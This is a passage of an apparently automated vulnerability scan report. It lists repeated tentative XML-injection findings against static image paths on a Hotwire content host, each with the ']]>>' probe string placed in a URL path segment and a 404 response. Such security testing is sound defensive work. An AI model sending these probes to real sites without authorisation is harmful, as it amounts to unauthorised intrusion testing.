Date: Mon, 03 Oct 2011 01:02:38 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.152. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-top-curved-corners.png

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/img-top-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:01:57 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.153. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-top-curved-corners.png

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/img-top-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535995
Date: Mon, 03 Oct 2011 01:02:00 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.154. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-top-curved-corners.png

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/img-top-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:05 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.155. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-top-curved-corners.png

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/img-top-curved-corners.png?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535944
Date: Mon, 03 Oct 2011 01:02:10 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.156. http://ak-static.hotwirestatic.com/static/images/hotel/details/img-top-curved-corners.png [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/img-top-curved-corners.png

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/img-top-curved-corners.png]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Expires: Mon, 03 Oct 2011 01:02:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:15 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.157. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bkgd.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/imgReviewsBox_Bkgd.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:22 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.158. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bkgd.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/imgReviewsBox_Bkgd.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:26 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.159. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bkgd.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/imgReviewsBox_Bkgd.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:30 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.160. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bkgd.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/imgReviewsBox_Bkgd.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:33 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.161. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bkgd.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bkgd.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/imgReviewsBox_Bkgd.gif]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:36 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.162. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bottom.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/imgReviewsBox_Bottom.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31536000
Date: Mon, 03 Oct 2011 01:02:23 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.163. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bottom.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/imgReviewsBox_Bottom.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535976
Date: Mon, 03 Oct 2011 01:02:25 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.164. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 3]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bottom.gif

Issue detail

The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel]]>>/details/imgReviewsBox_Bottom.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535964
Date: Mon, 03 Oct 2011 01:02:30 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.165. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 4]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bottom.gif

Issue detail

The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details]]>>/imgReviewsBox_Bottom.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535949
Date: Mon, 03 Oct 2011 01:02:33 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.166. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Bottom.gif [REST URL parameter 5]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Bottom.gif

Issue detail

The REST URL parameter 5 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 5. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images/hotel/details/imgReviewsBox_Bottom.gif]]>>?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Expires: Mon, 03 Oct 2011 01:02:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 03 Oct 2011 01:02:36 GMT
Content-Length: 1422
Connection: close
Vary: Accept-Encoding

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.167. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 1]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Top.gif

Issue detail

The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static]]>>/images/hotel/details/imgReviewsBox_Top.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
Vary: accept-language,accept-charset
Accept-Ranges: bytes
Content-Type: text/html; charset=iso-8859-1
Content-Language: en
Content-Length: 1422
Vary: Accept-Encoding
Cache-Control: private, max-age=31535963
Date: Mon, 03 Oct 2011 01:02:21 GMT
Connection: close

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" l
...[SNIP]...
8.168. http://ak-static.hotwirestatic.com/static/images/hotel/details/imgReviewsBox_Top.gif [REST URL parameter 2]  previous  next

Summary

Severity:   Medium
Confidence:   Tentative
Host:   http://ak-static.hotwirestatic.com
Path:   /static/images/hotel/details/imgReviewsBox_Top.gif

Issue detail

The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.

Request

GET /static/images]]>>/hotel/details/imgReviewsBox_Top.gif?ver=218159 HTTP/1.1
Host: ak-static.hotwirestatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.hotwire.com/hotel/details.jsp?actionType=2&inputId=hotel-results&searchId=6111849947&selectedSolutionId=135420317134&selectedPGoodId=236179701665
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Server: Apache
